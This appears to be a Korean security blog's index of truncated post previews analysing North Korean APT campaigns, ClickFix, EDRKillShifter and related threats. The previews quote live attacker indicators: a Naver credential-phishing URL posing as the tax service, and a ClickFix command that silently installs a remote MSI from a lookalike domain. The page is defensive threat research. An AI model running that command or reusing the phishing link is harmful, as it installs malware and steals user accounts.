Analysis (116) 썸네일형 리스트형 117. Kimsuky's 국세청 위장 피싱 메일 지난 11월 초, Kimsuky 조직이 유포한 것으로 보여지는 국세청 위장 피싱 메일이 탐지되었다. 메일은 아래와 같은 내용을 가지고 있으며, 국세청에서 전자문서를 보낸 것처럼 위장하고 있다. 실제 연결되는 url은 정상적인 국세청 url이 아니며 Kimsuky 그룹이 제작해놓은 피싱 사이트로 연결된다.* 연결 url: http://cn.cailteve.mydns.bz/nts/?m=uggcf%3N%2S%2Savq.anire.pbz%2Savqybtva.ybtva%3Shey%3Quggc%253N%252S%252Sznvy.anire.pbz%252S&wreply={계정} 연결 시 아래와 같은 네이버 아이디/비밀번호 입력 사이트가 나타난다. 공격자는 피싱 메일과 피싱 사이트를 통해 피해자의 네이버 계정을 탈취한다.. 116. MISP 2.4 --> MISP 2.5 MISP의 2.5 버전이 나온지는 꽤 오래되었지만, 지금까지 2.4 버전으로 운영해왔었다. 2.4 버전을 설치했었고, 2.5 버전으로의 업그레이드 필요성을 딱히 못 느꼈었기 때문이다. 얼마 전, 2.4 버전에 대한 지원이 이번년도를 마지막으로 끝날 예정이니 2.5로 업그레이드 하라는 문구가 뜨기 시작해 이번참에 업그레이드를 진행했다. 먼저, 서버의 운영체제가 Ubuntu 22.04 버전이었기 때문에 24.04 버전으로의 업그레이드부터 진행했다. 아래 명령어들을 이용하면 쉽게 업그레이드 할 수 있다.sudo apt update && sudo apt upgrade -ysudo apt install update-manager-coresudo do-release-upgrade# 만약 자동으로 24.04가 나오지.. 115. NK's Etherhiding correlation 2025년 10월 17일, 구글 GTIG(Google Threat Intelligence Group)에서 아래 보고서를 공개했다. 북한 공격자들이 이더리움 스마트 컨트랙트 조회 기능을 통해 악성코드를 유포 했다는 것이 주요 내용이다.https://cloud.google.com/blog/topics/threat-intelligence/dprk-adopts-etherhiding?hl=en DPRK Adopts EtherHiding: Nation-State Malware Hiding on Blockchains | Google Cloud BlogNorth Korea threat actor UNC5342 is leveraging the EtherHiding technique in espionage and fina.. 114. Kimsuky's NAVER 사칭 email 지속적으로 모니터링 중인 국내 이메일 송/수신 내역에서 네이버를 사칭해 악성코드 유포를 시도한 이메일이 발견되었다. 본 글에서는 해당 이메일과 악성코드에 대해 분석한다. 먼저, 이메일은 아래와 같은 내용으로 작성되어 있다. '네이버 리포트' 에서 전송한 것으로 위장하고 있으며 네이버를 사칭한 사이트가 확인되었으므로 개인정보가 유출되었는지 확인하라는 내용을 포함하고 있다. 동시에, 240312-001.alz 파일을 첨부파일로 첨부하고 있다. 메일을 전송한 계정은 "naver_report@company537.cafe24.com" 이며 네이버 리포트 계정을 사칭하고 있다. 첨부한 파일은 alz 압축 파일이며 내부에는 악성코드가 포함되어 있다. 내부에는 png 파일로 위장한 lnk 파일이 존재한다. lnk 파.. 113. NK's(Kimsuky, APT37) 한국디지털헬스케어진흥재단 소개자료.pdf.lnk 지난 9월 8일 X에 한국디지털헬스케어진흥재단 소개자료.pdf.lnk 파일이 공개되었다. 해당 파일은 변수명 및 실행 코드와 악성 행위 등으로 보아 Kimsuky 그룹 혹은 APT37 그룹이 제작해 유포한 것으로 보여진다. 본 글에서는 해당 악성코드를 분석한다. 먼저, 파일의 정보는 아래와 같다.* sha256: 8458e7351be79746bb9e95fc59a8da74bdadbe398dcd93dea9d9adc69ccbccd7 파일은 lnk 형식을 갖고 있으며 파일 내부에서는 파워쉘 실행 명령어 및 파워쉘 코드를 포함하고 있다. 파일 실행 시, 파워쉘 코드가 실행되며 실제 악성코드가 실행되는 형태이다. 실행되는 파워쉘 코드는 base64 인코딩 된 상태로 존재하며 실행 시 base64 디코딩 이후 코.. 112. ClickFix in wild ClickFix 공격 기법이 실제 악용되는 사례를 발견해 분석해본다. 본 글에서는 ClickFix 공격 기법을 통해 유포되는 악성코드를 분석한다. 먼저, 아래 화면은 ClickFix 공격이 악용되고 있는 공격자의 사이트이다. 실제 도메인은 다른 도메인을 사용중이며 정상 사이트로 위장하기 위해 koinly.io, electrum.org 로 위장하고 있는 것을 볼 수 있다. 위 화면에서 각각 가장 오른쪽에 존재하는 화면인 "Verifying you are human" 이 나타나면 피해자 PC의 클립보드에는 아래와 같은 명령어가 삽입된다.cmd /c start msiexec /q /i https://deveIoper.com/captcha/verify.msi & rem CIоudfIаre Verificatiоn.. 111. EDRKillShifter 2024년도부터 RansomHub 등의 랜섬웨어 그룹은 랜섬웨어 유포, 감염의 용이성을 위해 사용자 PC에 설치된 EDR을 무력화 시키는 공격 도구를 사용하고 있다. EDRKillShifter는 그 중 하나에 속하며 커널 권한을 이용해 공격자가 지정한 EDR의 동작을 중지 시키는 등의 행위를 수행한다. 본 글에서는 EDRKillShifter를 분석한다. * sha256: f982dfc0a0984f317460ca6d27d72ad6b3274b58cb7cf984e1c3e6f001e1edf8 먼저, 파일의 정보는 아래와 같다. EDRKillShifter은 몇 가지 단계를 거쳐 최종 페이로드를 통해 EDR을 무력화시킨다. 즉, 직접적으로 수행하는 행위는 로더에 가깝다고 볼 수 있다. 가장 먼저로는 공격 도구를 허.. 110. APT Down - The North Korea Files 2025년 8월에 개최된 DEF CON 33에서 "APT Down - The North Korea Files" 보고서가 공개되었다. 해당 보고서는 약 8.9GB의 방대한 규모의 데이터를 함께 포함한다. 데이터는 "Saber", "cyb0rg"에 의해 공개되었으며 APT 위협 행위자 "KIM"의 가상 머신, VPS에서 탈취한 것이다. 데이터를 탈취할 수 있었던 경위로는 OPSEC의 미비로 인해 공개된 가상 머신, VPS에 접근할 수 있었음으로 보여진다. 본 글에서는 공개된 데이터 중 일부를 정리한다. 국군방첩사령부 침해유출된 데이터 내에는 국군방첩사령부(dcc.mil.kr)에 대한 내용이 존재한다. APT 공격 행위자는 국군방첩사령부를 대상으로 피싱 공격을 수행한 것으로 보이며, 이 공격을 통해 방첩사령부.. 이전 1 2 3 4 ··· 15 다음
